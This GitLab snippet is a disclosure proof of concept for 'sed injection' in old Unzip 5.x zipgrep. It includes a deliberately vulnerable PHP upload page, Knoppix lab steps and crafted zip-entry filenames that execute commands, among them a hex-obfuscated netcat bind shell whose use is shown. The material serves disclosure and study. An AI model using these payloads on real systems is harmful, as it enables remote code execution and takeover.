Skip to content
GitLab
public
Authored by avatar cleemy desu wayo

a sample of a vulnerability in ancient zipgrep (sed injection)

about this bug

This is an ancient vulnerability of zipgrep in Unzip 5.x. zipgrep is a wrapper script. Perhaps this problem does not exist for zipgrep in Unzip 6.x.

I have notified the developers of Unzip about this bug on Feb 12, 2022. The current maintainer is aware of the bug, but it is likely that a fixed version will not be released.

I call this bug or something similar "sed injection". There is a similar vulnerability like CVE-2005-0758. I became aware of sed injection on my own in 2013, but I was not aware of CVE-2005-0758 at that time.

This sample is a modified version of "a sample of CVE-2005-0758" ( https://gitlab.com/-/snippets/2580438 ).

about sed injection

try this sample on Knoppix 3.6

Apache 1.3.31, PHP 4.3.8, and vulnerable zipgrep are installed from the beginning when booting from Knoppix 3.6 (released at 2004) Live CD.

you can run this sample on Knoppix 3.6 very easily without special settings.

download Knoppix iso

Edited
  • Clone with SSH
  • Clone with HTTPS
    • test-zipgrep.php 9.05 KiB
    1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 
    <!doctype html>
<html lang="en-US">
<head>
<!--
============================================================
       a sample of a vulnerability in ancient zipgrep

      written by cleemy desu wayo / licensed under CC0
                 last update: 2023-08-13
============================================================

* try this sample on Knoppix 3.6:

  Apache 1.3.31, PHP 4.3.8, and vulnerable zipgrep are installed
  from the beginning when booting from Knoppix 3.6 (released
  at 2004) Live CD.

  you can run this sample on Knoppix 3.6 very easily without
  special settings.


* download Knoppix iso:

  https://ftp.kh.edu.tw/Linux/KNOPPIX/ISO/EN/
  https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.6-2004-08-16-EN.iso.md5.asc


* how to run this sample:

  1. boot Knoppix Live CD ordinarily

  2. put this file (test-zipgrep.php) on /var/www/ on server.
     "server" means Knoppix.

  3. change owner and chmod (on server)
      $ cd /var/www
      $ sudo chown www-data:www-data test-zipgrep.php
      $ sudo chmod 600 test-zipgrep.php

  4. start apache (on server)
      $ sudo apachectl start

  5. try connect from a client machine to
     http://<knoppix>/test-zipgrep.php
     (when Knoppix is running on VirtualBox or some such,
      "client machine" means host OS)
-->
<title>a sample of a vulnerability in ancient zipgrep (sed injection)</title>
<style>
  body { margin: 0 0 0 0; font-family: Arial;}
  h1, h2, h3, form, div, p { margin: 2.2rem 1.2rem 1.2rem 1.4rem; color: #333; }
  h1 { margin: 1rem 1.2rem 0.4rem 1.8rem; font-size: 2.1rem; }
  h2 { margin: 2.2rem 1.2rem 1.2rem 1.2rem; font-size: 1.6rem; }
  h3 { margin: 1.6rem 1.2rem 0.8rem 1.2rem; font-size: 1.1rem; }
  p { margin: 0.8rem 3rem 0.8rem 1.8rem; }
  form, div.fileinfo, div.description {
    margin: 2.2rem 2% 1.2rem 2%;
    padding: 0 0 2.2rem 0.6rem;
    border: 2px solid #ccc;
    border-radius: 8px;
  }
  ul, ol { margin: 0.8rem 1rem 0.9rem 1.2rem; }
  ul li { margin: 0.1rem 0 0.1rem 0; }
  ol li { margin: 0.8rem 0 0.9rem 0; }
  li a, p a { font-size: 0.85rem; }
  p.notice { font-size: 0.9rem; margin: 0 3rem 1.8rem 2.2rem; }
  span.info {
    margin-left: 0.8rem;
    color: #6666aa;
    font-size: 105%;
  }
  code {
    margin: 0.6rem 0 1.2rem 1.2rem;
    padding: 0.6rem 0 0.6rem 0.6rem;
    display: block;
    background-color: #333;
    color: #eee;
    max-width: 40rem;
    line-height: 110%;
  }
  a { text-decoration: none; }
  a:hover { text-decoration: underline; }
  footer {
    margin: 3rem 0 0 0;
    padding: 1.2rem 1rem 1.2rem 1rem;
    background-color: #eee;
  }
</style>
</head>
<body>
<h1>a sample of a vulnerability in ancient zipgrep</h1>
<p>written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-13</p>
<div class="fileinfo">
<h2>uploaded file infomartion:</h2>
<?
  if(empty($_FILES)) {
    print('<p>(no file uploaded)</p>');
  } else{
    $is_zip_str = 'no';

    $original_file_basename = basename($_FILES['file']['name']);
    $original_file_pathinfo = pathinfo($original_file_basename);
    if($original_file_pathinfo['extension'] === 'zip') {
      $is_zip_str = 'yes';

      // exec zipgrep
      exec('zipgrep CVE "'. $_FILES['file']['tmp_name']. '"', $search_results);

      // move to ./zip_stored/
      move_uploaded_file($_FILES['file']['tmp_name'], './zip_stored/'. $original_file_basename);

      // save search results
      $fp = fopen('./zip_stat/latest-search-result.txt', 'w');
      foreach ($search_results as $line) {
        fwrite($fp, $line. "\n");
      }
      fclose($fp);
    }

    print('<p>file name: <span class="info">'. htmlspecialchars($_FILES['file']['name']). '</span></p>');
    print('<p>tmp file name: <span class="info">'. htmlspecialchars($_FILES['file']['tmp_name']). '</span></p>');
    print('<p>stored to zip_stored/ directory: <span class="info">'. htmlspecialchars($is_zip_str). '</span></p>');
  }
?>
</div>

<form enctype="multipart/form-data" method="post">
<h2>try upload a file:</h2>
<p><input type="file" name="file"></p>
<p><input type="submit"></p>
</form>

<div class="description">
<h2>about this bug</h2>
<p>This is an ancient vulnerability of zipgrep in Unzip 5.x. zipgrep is a wrapper script. Perhaps this problem does not exist for zipgrep in Unzip 6.x.</p>
<p>I have notified the developers of Unzip about this bug on Feb 12, 2022. The current maintainer is aware of the bug, but it is likely that a fixed version will not be released.</p>
<p>I call this bug or something similar "sed injection". There is a similar vulnerability like CVE-2005-0758. I became aware of sed injection on my own in 2013, but I was not aware of CVE-2005-0758 at that time.</p>
<p>This sample is a modified version of "a sample of CVE-2005-0758" ( <a href="https://gitlab.com/-/snippets/2580438">https://gitlab.com/-/snippets/2580438</a> ).

<h2>about sed injection</h2>
<ul>
  <li>CWE-74: <a href="https://cwe.mitre.org/data/definitions/74.html">https://cwe.mitre.org/data/definitions/74.html</a></li>
  <li>CWE-77: <a href="https://cwe.mitre.org/data/definitions/77.html">https://cwe.mitre.org/data/definitions/77.html</a></li>
  <li>CVE-2022-1509: <a href="https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/">https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/</a></li>
  <li>CVE-2005-0758: <a href="https://bugs.gentoo.org/90626">https://bugs.gentoo.org/90626</a></li>
</ul>

<h2>try this sample on Knoppix 3.6</h2>

<p>Apache 1.3.31, PHP 4.3.8, and vulnerable zipgrep are installed from the beginning when booting from Knoppix 3.6 (released at 2004) Live CD.</p>
<p>you can run this sample on Knoppix 3.6 very easily without special settings.</p>

<h3>download Knoppix iso</h3>
<ul>
  <li><a href="https://ftp.kh.edu.tw/Linux/KNOPPIX/ISO/EN/">https://ftp.kh.edu.tw/Linux/KNOPPIX/ISO/EN/</a></li>
  <li><a href="https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.6-2004-08-16-EN.iso.md5.asc">https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.6-2004-08-16-EN.iso.md5.asc</a></li>
</ul>

<h3>try RCE</h3>
<ol>
  <li>boot Knoppix Live CD ordinarily</li>
  <li>put this file (test-zipgrep.php) on /var/www/ on server. "server" means Knoppix.</li>
  <li>change owner and chmod (on server)<code>$ cd /var/www<br>$ sudo chown www-data:www-data test-zipgrep.php<br>$ sudo chmod 600 test-zipgrep.php</code></li>
  <li>start apache (on server)<code>$ sudo apachectl start</code></li>
  <li>try connect from a client machine to http://&lt;knoppix&gt;/test-zipgrep.php<br>(when Knoppix is running on VirtualBox or some such, "client machine" means host OS)</li>
  <li>create some directories in /var/www (on server)<code>$ cd /var/www<br>$ sudo mkdir zip_stat<br>$ sudo mkdir zip_stored</code></li>
  <li>change owner and chmod (on server)<code>$ sudo chown www-data:www-data zip_stat zip_stored<br>$ sudo chmod 707 zip_stat zip_stored<br></code></li>
  <li>create a ordinary text file (on client)<code>$ echo CVE-2099-0001 &gt; hoge.txt</code></li>
  <li>create a text file with a crafted filename (on client)<code>$ echo CVE-2099-0002 &gt; '|;edate;#.txt'</code></li>
  <li>archive these files into one .zip (on client)<pre><code>$ zip test1.zip *.txt<br>  adding: hoge.txt (stored 0%)<br>  adding: |;edate;#.txt (stored 0%)</code></pre></li>
  <li>access from the client machine to http://&lt;knoppix&gt;/test-zipgrep.php<br>and upload test1.zip</li>
  <li>check if you have successfully uploaded (on server)<code>$ cd /var/www/zip_stored<br>$ sudo wc -c test1.zip<br>348 test1.zip.</code></li>
  <li>check if date command was executed and the search result is weird (on server)<pre><code>$ cd /var/www/zip_stat<br>$ cat latest-search-result.txt<br>hoge.txt:CVE-2099-0001<br>Sun Aug 13 15:49:50 EDT 2023<br>CVE-2099-0002</code></pre></li>
</ol>

<h2>crafted filenames examples</h2>

<h3>several commands</h3>
<ul>
  <li>you can exec several commands (this only taints the search results):<code>|;edate;whoami;id;#.txt</code></li>
</ul>

<h3>exec xgalaga on server-side</h3>
<ul>
  <li>this may not work:<code>|;exgalaga;#.txt</code></li>
  <li>this works fine (exec /usr/games/xgalaga):<code>|;eecho 2f7573722f67616d65732f7867616c6167610a|xxd -r -p|sh;#.txt</code><p class="notice">(the above sample should not work well with /usr/bin/zipgrep in knoppix 3.2)</p></li>
</ul>

<h3>get a reverse shell</h3>
<ul>
  <li>exec 'nc -lnvp 4545 -e /bin/sh':<code>|;eecho 6e63202d6c6e76702034353435202d65202f62696e2f73680a|xxd -r -p|sh;#.txt</code><p class="notice">(the above sample should not work well with /usr/bin/zipgrep in knoppix 3.2)</p></li>
  <li>try connect to a reverse shell with netcat (from a client machine)<code>$ nc 192.168.1.3 4545<br>uname -a<br>Linux Knoppix 2.4.27 #2 SMP Mo Aug 9 00:39:37 CEST 2004 i686 GNU/Linux<br>pwd<br>/var/www<br>whoami<br>www-data</code></li>
</ul>

</div>

<footer>
<p>written by cleemy desu wayo (
  <a href="https://github.com/cleemy-desu-wayo">GitHub</a> - 
  <a href="https://gitlab.com/cleemy-desu-wayo">GitLab</a> - 
  <a href="https://huntr.dev/users/cleemy-desu-wayo/">huntr.dev</a> - 
  <a href="https://note.com/cleemy/">note.com</a>)
</p>
<p>license: CC0</p>
<p>initial release: 2023-08-13</p>
<p>last update: 2023-08-13</p>
</footer>
</body>
</html>
    0% or .
    You are about to add 0 people to the discussion. Proceed with caution.
    Finish editing this message first!
    Please register or to comment